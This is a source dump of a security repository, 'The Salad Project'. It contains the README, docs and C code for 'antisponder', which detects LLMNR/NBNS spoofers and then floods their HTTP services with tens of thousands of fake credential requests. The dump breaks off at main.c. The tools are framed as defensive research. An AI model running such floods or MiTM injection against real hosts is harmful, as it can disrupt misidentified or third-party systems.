├── LICENSE.md ├── Readme.md ├── antisponder ├── INSTRUCTIONS.TXT ├── Makefile ├── Readme.md ├── destroy.c ├── destroy.h ├── getcreds.c ├── getcreds.h ├── interface.c ├── interface.h ├── main.c ├── nameres.c ├── nameres.h ├── rand.c ├── rand.h └── udp.c ├── ewok ├── CryptoShenanigans.c ├── Makefile ├── Readme.MD ├── ewok.c ├── example.ps1 ├── global.c ├── global.h ├── grabtemplate.sh ├── http.c ├── network.c └── network.h ├── pesky ├── Makefile ├── Readme.md ├── eap.c ├── eap.h ├── eapmap.h ├── eth.h ├── getbssid.c ├── getbssid.h ├── global.c ├── global.h ├── main.c ├── network.c ├── network.h ├── rand.c ├── rand.h ├── sendproberequest.c ├── sendprobes.c ├── sniffloop.c └── table.h └── shove ├── Makefile ├── Readme.md ├── example.xml ├── main.c ├── network.c ├── network.h ├── readxml.c └── readxml.h /LICENSE.md: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, John Ventura 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /Readme.md: -------------------------------------------------------------------------------- 1 | Welcome to The Salad Project 2 | 3 | 4 | 5 | These tools are designed to demonstrate technologies for the enhancement of 6 | Intrustion Detection/Prevention Systems (IDS/IPSes). Simplicity was also an 7 | across the board design goal, hopefully demonstrating that network security 8 | does not need to involve high price "magic boxes." 9 | 10 | The name "Salad" comes from "Seek-Locate-Destroy", which is the title of an 11 | episode of the groundbreaking space opera television show Blakes 7. 12 | In this episode, several characters engage in a plot to break encryption 13 | by stealing an encryption/decryption device. 14 | 15 | 16 | 17 | The current tool set includes: 18 | 19 | 20 | Shove 21 | 22 | A MiTM utility that sniffs for pre-defined TCP segments and inserts 23 | scripted responses into the data stream 24 | Ewok 25 | 26 | A MiTM utility that targets Powershell Empire by repackaging "stage 2" 27 | payloads. 28 | 29 | Pesky 30 | 31 | A utility that frustrates WPA2 Pre-Shared Key (PSK) recovery attacks 32 | by spoofing false handshakes with arbitrary PSKs 33 | 34 | Sol 35 | 36 | Detection and eventual frustration of "karma" attacks 37 | 38 | Antisponder 39 | 40 | Detection and frustration of LLMNR/NBNS response spoofing MiTM attacks 41 | 42 | 43 | -------------------------------------------------------------------------------- /antisponder/INSTRUCTIONS.TXT: -------------------------------------------------------------------------------- 1 | antisponder.salad -d "log flood" -t 2 2 | 3 | This program seeks out and disrupts or destroys Man in The Middle (MiTM) 4 | attacks based on fraudelent responses to broadcast name queries. Attackers 5 | with hosts that respond to all broadcast LLMNR or NBNS name queries will are 6 | detectable. This program sends out queries for randomly named hosts and 7 | assumes that all hosts that respond are performing MiTM attacks. It attaches 8 | to their HTTP(S) services and either floods them or sends fraudelent queries. 9 | 10 | Command Line Examples: 11 | 12 | antisponder.salad -d "log flood" -t 2 -i eth0 13 | -d "log" the attack and "flood" the attacker with fake hashes 14 | -t repeat the detection methodology every 2 seconds 15 | -i use the "eth0" network interface 16 | 17 | antisponder.salad -d "hash" -u usernames.txt -p 20 18 | -d send a username/password combination from a text file 19 | -u text file with usernames and possibly passwords 20 | -p repeat the detection methodology at random time interfals that average out to 20 seconds 21 | 22 | 23 | 24 | Username/Password File Format: 25 | Each entry should be delimeted with a '\n'. 26 | Passwords are optional, if you want to include them, use a space or tab to separate the username and password. This works for the user "gthomas" with the password "liberator123": 27 | gthomas liberator123 28 | 29 | If you want the computer to make up really difficult passwords, just 30 | leave out the commas and the passwords. 31 | 32 | 33 | -------------------------------------------------------------------------------- /antisponder/Makefile: -------------------------------------------------------------------------------- 1 | CC = gcc 2 | CFLAGS = -O3 -Wall 3 | PROGNAME = antisponder.salad 4 | 5 | default: all 6 | 7 | all: 8 | $(CC) $(CFLAGS) -c destroy.c 9 | $(CC) $(CFLAGS) -c rand.c 10 | $(CC) $(CFLAGS) -c udp.c 11 | $(CC) $(CFLAGS) -c interface.c 12 | $(CC) $(CFLAGS) -c getcreds.c 13 | $(CC) $(CFLAGS) -c nameres.c 14 | $(CC) $(CFLAGS) main.c udp.o rand.o destroy.o interface.o getcreds.o nameres.o -lcurl -lpthread -o $(PROGNAME) 15 | 16 | clean: 17 | rm -f *.o $(PROGNAME) 18 | -------------------------------------------------------------------------------- /antisponder/Readme.md: -------------------------------------------------------------------------------- 1 | This program seeks out and disrupts or destroys Man in The Middle (MiTM) 2 | attacks based on fraudelent responses to broadcast name queries. Attackers 3 | with hosts that respond to all broadcast LLMNR or NBNS name queries will are 4 | detectable. This program sends out queries for randomly named hosts and 5 | assumes that all hosts that respond are performing MiTM attacks. It attaches 6 | to their HTTP(S) services and either floods them or sends fraudelent queries. 7 | 8 | Command Line Examples: 9 | 10 | antisponder.salad -d "log flood" -t 2 -i eth0 11 | 12 | -d "log" the attack and "flood" the attacker with fake hashes 13 | -t repeat the detection methodology every 2 seconds 14 | -i use the "eth0" network interface 15 | 16 | antisponder.salad -d "hash" -u usernames.txt -p 20 17 | 18 | -d send a username/password combination from a text file 19 | -u text file with usernames and possibly passwords 20 | -p repeat the detection methodology at random time interfals that average out to 20 seconds 21 | 22 | 23 | 24 | Username/Password File Format: 25 | Each entry should be delimeted with a '\n'. 26 | Passwords are optional, if you want to include them, use a space or tab 27 | to separate the username and password. This works for the user "gthomas" 28 | with the password "liberator123": 29 | 30 | gthomas liberator123 31 | 32 | If you want the computer to make up really difficult passwords, just leave out the commas and the passwords. 33 | 34 | -------------------------------------------------------------------------------- /antisponder/destroy.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include "destroy.h" 40 | #include "rand.h" 41 | #include "getcreds.h" 42 | 43 | int rval; 44 | 45 | const struct destbl destab[] = { 46 | {"log", DES_LOG}, 47 | {"hash", DES_HASH}, 48 | {"flood", DES_FLOOD}, 49 | {NULL, 0} 50 | }; 51 | 52 | 53 | static size_t donothing(void *ptr, size_t size, size_t nmemb, void *stream) { 54 | rval = size; 55 | return (0); 56 | } 57 | 58 | int sendHTTPhash(char *username, char *password, char *host, char *url) { 59 | struct curl_slist *chunk = NULL; 60 | FILE *devnull = NULL; 61 | CURL *curl; 62 | CURLcode res; 63 | char *hostheader = "Host: "; 64 | 65 | rval = 0; 66 | 67 | curl = curl_easy_init(); 68 | if (curl) { 69 | if (host != NULL) { 70 | hostheader = 71 | (char *) malloc(strlen(host) + strlen(hostheader)); 72 | if (hostheader == NULL) { 73 | perror("can't allocate memory"); 74 | exit(1); 75 | } 76 | sprintf(hostheader, "Host: %s", host); 77 | chunk = curl_slist_append(chunk, hostheader); 78 | curl_easy_setopt(curl, CURLOPT_HTTPHEADER, chunk); 79 | } 80 | curl_easy_setopt(curl, CURLOPT_URL, url); 81 | curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long) CURLAUTH_ANY); 82 | curl_easy_setopt(curl, CURLOPT_USERNAME, username); 83 | curl_easy_setopt(curl, CURLOPT_PASSWORD, password); 84 | 85 | curl_easy_setopt(curl, CURLOPT_NOPROGRESS, 1L); 86 | curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, donothing); 87 | devnull = fopen("/dev/null", "wb"); 88 | if (devnull == NULL) { 89 | perror("can't open /dev/null"); 90 | exit(1); 91 | } 92 | curl_easy_setopt(curl, CURLOPT_WRITEDATA, devnull); 93 | 94 | res = curl_easy_perform(curl); 95 | if (res != CURLE_OK) { 96 | curl_easy_strerror(res); 97 | } 98 | curl_easy_cleanup(curl); 99 | } 100 | if (host != NULL) { 101 | free(hostheader); 102 | } 103 | fclose(devnull); 104 | return (rval); 105 | } 106 | 107 | int destroy(uint32_t ip, char *fakename, char **user, char **pass, 108 | int mask) { 109 | if (mask & DES_LOG) { 110 | destroylog(ip, fakename, user, pass); 111 | } 112 | if (mask & DES_HASH) { 113 | destroyhash(ip, fakename, user, pass); 114 | } 115 | if (mask & DES_FLOOD) { 116 | destroyflood(ip, fakename, user, pass); 117 | } 118 | 119 | return (0); 120 | } 121 | 122 | int destroyhash(uint32_t ip, char *fakename, char **user, char **pass) { 123 | char *url; 124 | int urllen = 32; // only need 24 for URL 125 | int diditwork; 126 | int usernumber; 127 | uint8_t octets[4]; 128 | 129 | octets[0] = ip & 0xff; 130 | octets[1] = (ip >> 8) & 0xff; 131 | octets[2] = (ip >> 16) & 0xff; 132 | octets[3] = (ip >> 24) & 0xff; 133 | 134 | if (user == NULL) { 135 | perror("No users listed\n"); 136 | exit(1); 137 | } 138 | 139 | usernumber = getrand16() % countusers(user); 140 | 141 | url = (char *) malloc(urllen); 142 | if (url == NULL) { 143 | perror("can't allocate memory"); 144 | exit(1); 145 | } 146 | sprintf(url, "https://%i.%i.%i.%i/", octets[0], octets[1], octets[2], 147 | octets[3]); 148 | diditwork = 149 | sendHTTPhash(user[usernumber], pass[usernumber], fakename, url); 150 | if (diditwork == 0) { 151 | 152 | sprintf(url, "http://%i.%i.%i.%i/", octets[0], octets[1], 153 | octets[2], octets[3]); 154 | sendHTTPhash(user[usernumber], pass[usernumber], fakename, url); 155 | } 156 | 157 | free(url); 158 | return (0); 159 | } 160 | 161 | int destroyflood(uint32_t ip, char *fakename, char **user, char **pass) { 162 | char *url; 163 | int urllen = 32; // only need 24 for URL 164 | int diditwork; 165 | uint8_t octets[4]; 166 | char *username; 167 | char *password; 168 | int fieldlen = 0xff; 169 | int i; 170 | 171 | username = (char *) malloc(fieldlen); 172 | if (username == NULL) { 173 | perror("can't allocaet memory"); 174 | exit(1); 175 | } 176 | password = (char *) malloc(fieldlen); 177 | if (password == NULL) { 178 | perror("can't allocaet memory"); 179 | exit(1); 180 | } 181 | 182 | octets[0] = ip & 0xff; 183 | octets[1] = (ip >> 8) & 0xff; 184 | octets[2] = (ip >> 16) & 0xff; 185 | octets[3] = (ip >> 24) & 0xff; 186 | 187 | url = (char *) malloc(urllen); 188 | if (url == NULL) { 189 | perror("can't allocate memory"); 190 | exit(1); 191 | } 192 | 193 | for (i = 0; i < 0xffff; i++) { 194 | fillstr(username, fieldlen, CHARALPHALOWER); 195 | fillstr(password, fieldlen, CHAREVERYTHING); 196 | sprintf(url, "https://%i.%i.%i.%i/", octets[0], octets[1], 197 | octets[2], octets[3]); 198 | diditwork = sendHTTPhash(username, password, fakename, url); 199 | if (diditwork == 0) { 200 | 201 | sprintf(url, "http://%i.%i.%i.%i/", octets[0], octets[1], 202 | octets[2], octets[3]); 203 | sendHTTPhash(username, password, fakename, url); 204 | } 205 | 206 | } 207 | free(username); 208 | free(password); 209 | free(url); 210 | return (0); 211 | } 212 | 213 | int destroylog(uint32_t ip, char *fakename, char **user, char **pass) { 214 | uint8_t octets[4]; 215 | 216 | octets[0] = ip & 0xff; 217 | octets[1] = (ip >> 8) & 0xff; 218 | octets[2] = (ip >> 16) & 0xff; 219 | octets[3] = (ip >> 24) & 0xff; 220 | 221 | printf("Detected spoofing at %i.%i.%i.%i\n", octets[0], 222 | octets[1], octets[2], octets[3]); 223 | 224 | openlog(PROGNAME, LOG_CONS | LOG_NDELAY, LOG_AUTH); 225 | syslog(LOG_WARNING, "blah"); 226 | syslog(LOG_WARNING, "Detected spoofing at %i.%i.%i.%i\n", octets[0], 227 | octets[1], octets[2], octets[3]); 228 | closelog(); 229 | 230 | return (0); 231 | } 232 | 233 | 234 | int getdestroymask(char *str) { 235 | char *p; 236 | char *q; 237 | int mask = 0; 238 | int i; 239 | 240 | for (p = str; (q = strtok(p, ", ")); p = NULL) { 241 | for (i = 0; destab[i].str != NULL; i++) { 242 | if (!strncmp(q, destab[i].str, strlen(destab[i].str))) { 243 | mask = mask | destab[i].value; 244 | } 245 | } 246 | } 247 | return (mask); 248 | } 249 | -------------------------------------------------------------------------------- /antisponder/destroy.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | int destroy(uint32_t ip, char *fakename, char **user, char **pass, 34 | int mask); 35 | int destroyhash(uint32_t ip, char *fakename, char **user, char **pass); 36 | int destroyflood(uint32_t ip, char *fakename, char **user, char **pass); 37 | int destroylog(uint32_t ip, char *fakename, char **user, char **pass); 38 | int getdestroymask(char *str); 39 | 40 | 41 | #define DES_LOG 0x01 42 | #define DES_HASH 0x02 43 | #define DES_FLOOD 0x04 44 | 45 | #define PROGNAME "antisponder" 46 | 47 | struct destbl { 48 | char *str; 49 | int value; 50 | }; 51 | 52 | extern const struct destbl destab[]; 53 | 54 | 55 | struct destroyargs { 56 | uint32_t ip; 57 | char *fakename; 58 | }; 59 | -------------------------------------------------------------------------------- /antisponder/getcreds.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include "getcreds.h" 38 | #include "rand.h" 39 | 40 | #define MAXUSERLEN 64 41 | 42 | //take a file list and return a string array 43 | struct creddb *getuserlist(char *filename) { 44 | int linecount; 45 | char *buf; 46 | int i; 47 | char **username; 48 | char **pass; 49 | FILE *src; 50 | struct creddb *creds; 51 | 52 | creds = (struct creddb *) malloc(sizeof(struct creddb)); 53 | if (creds == NULL) { 54 | perror("can't open file"); 55 | exit(1); 56 | } 57 | 58 | src = fopen(filename, "rb"); 59 | if (src == NULL) { 60 | perror("can't open file"); 61 | exit(1); 62 | } 63 | //count the lines 64 | buf = (char *) malloc(MAXUSERLEN); 65 | if (buf == NULL) { 66 | perror("can't allocate memory"); 67 | exit(1); 68 | } 69 | for (linecount = 0; fgets(buf, MAXUSERLEN, src); linecount++); 70 | free(buf); 71 | 72 | //start over and read the file again 73 | fseek(src, 0x00, SEEK_SET); 74 | 75 | username = malloc((linecount + 1) * (sizeof(char *))); 76 | if (username == NULL) { 77 | perror("can't allocate memory"); 78 | exit(1); 79 | } 80 | 81 | pass = malloc((linecount + 1) * (sizeof(char *))); 82 | if (pass == NULL) { 83 | perror("can't allocate memory"); 84 | exit(1); 85 | } 86 | 87 | for (i = 0; i < linecount; i++) { 88 | username[i] = (char *) malloc(MAXUSERLEN); 89 | if (username[i] == NULL) { 90 | perror("can't allocate memory"); 91 | exit(1); 92 | } 93 | if (fgets(username[i], MAXUSERLEN, src) == NULL) { 94 | //if we can't read the file anymore, stop trying 95 | break; 96 | } 97 | username[i] = strtok(username[i], CREDDELIM); 98 | pass[i] = strtok(NULL, CREDDELIM); 99 | if ((pass[i] == NULL) || (strlen(pass[i]) == 0)) { 100 | // FILL IN THE PASSWORD 101 | pass[i] = (char *) malloc(MAXUSERLEN); 102 | if (pass[i] == NULL) { 103 | perror("can't allocate memory"); 104 | exit(1); 105 | } 106 | fillstr(pass[i], getrand8() % 8 + 10, CHAREVERYTHING); 107 | } 108 | } 109 | // trailing NULL lets us know list is over 110 | username[i + 1] = NULL; 111 | pass[i + 1] = NULL; 112 | creds->users = username; 113 | creds->passwords = pass; 114 | 115 | fclose(src); 116 | return (creds); 117 | } 118 | 119 | int countusers(char **users) { 120 | int rval; 121 | for (rval = 0; users[rval] != NULL; rval++); 122 | return (rval); 123 | } 124 | -------------------------------------------------------------------------------- /antisponder/getcreds.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | int chopstr(char *str); 34 | struct creddb *getuserlist(char *filename); 35 | int countusers(char **users); 36 | char **getpasswordlist(int howmany); 37 | 38 | // usernames and passwords are 39 | // separated by spaces or tabs 40 | // newlines and CRs are trimmed 41 | #define CREDDELIM "\x20\t\r\n" 42 | 43 | struct creddb { 44 | char **users; 45 | char **passwords; 46 | }; 47 | -------------------------------------------------------------------------------- /antisponder/interface.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | 40 | uint32_t remoteip; 41 | uint32_t remotebcast; 42 | 43 | int guessintname(char *intname, int namelen) { 44 | struct ifaddrs *ifap, *ifa; 45 | int buflen = namelen; 46 | char *outbuf = ""; 47 | 48 | getifaddrs(&ifap); 49 | for (ifa = ifap; ifa; ifa = ifa->ifa_next) { 50 | if (ifa->ifa_addr->sa_family == AF_INET) { 51 | outbuf = ifa->ifa_name; 52 | } 53 | } 54 | if (strlen(outbuf) < buflen) 55 | buflen = strlen(outbuf); 56 | memcpy(intname, outbuf, buflen); 57 | intname[strlen(outbuf)] = 0x00; 58 | freeifaddrs(ifap); 59 | return (0); 60 | } 61 | 62 | uint32_t getipv4addr(char *intname) { 63 | struct ifaddrs *ifap, *ifa; 64 | struct sockaddr_in *sa; 65 | uint32_t rval = 0; 66 | 67 | getifaddrs(&ifap); 68 | for (ifa = ifap; ifa; ifa = ifa->ifa_next) { 69 | if ((ifa->ifa_addr->sa_family == AF_INET) 70 | && !(strcmp(ifa->ifa_name, intname))) { 71 | sa = (struct sockaddr_in *) ifa->ifa_addr; 72 | rval = sa->sin_addr.s_addr; 73 | } 74 | } 75 | 76 | freeifaddrs(ifap); 77 | return (htonl(rval)); 78 | } 79 | 80 | uint32_t getipv4bcast(char *intname) { 81 | struct ifaddrs *ifap, *ifa; 82 | struct sockaddr_in *sa; 83 | uint32_t rval = 0; 84 | 85 | getifaddrs(&ifap); 86 | for (ifa = ifap; ifa; ifa = ifa->ifa_next) { 87 | if ((ifa->ifa_addr->sa_family == AF_INET) 88 | && !(strcmp(ifa->ifa_name, intname))) { 89 | sa = (struct sockaddr_in *) (ifa->ifa_ifu.ifu_broadaddr); 90 | rval = sa->sin_addr.s_addr; 91 | } 92 | } 93 | 94 | freeifaddrs(ifap); 95 | return (htonl(rval)); 96 | } 97 | -------------------------------------------------------------------------------- /antisponder/interface.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | 35 | extern uint32_t remoteip; 36 | extern uint32_t remotebcast; 37 | 38 | 39 | #define MAXINTLEN 512 40 | 41 | int guessintname(char *intname, int namelen); 42 | uint32_t getipv4addr(char *intname); 43 | uint32_t getipv4bcast(char *intname); 44 | -------------------------------------------------------------------------------- /antisponder/main.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 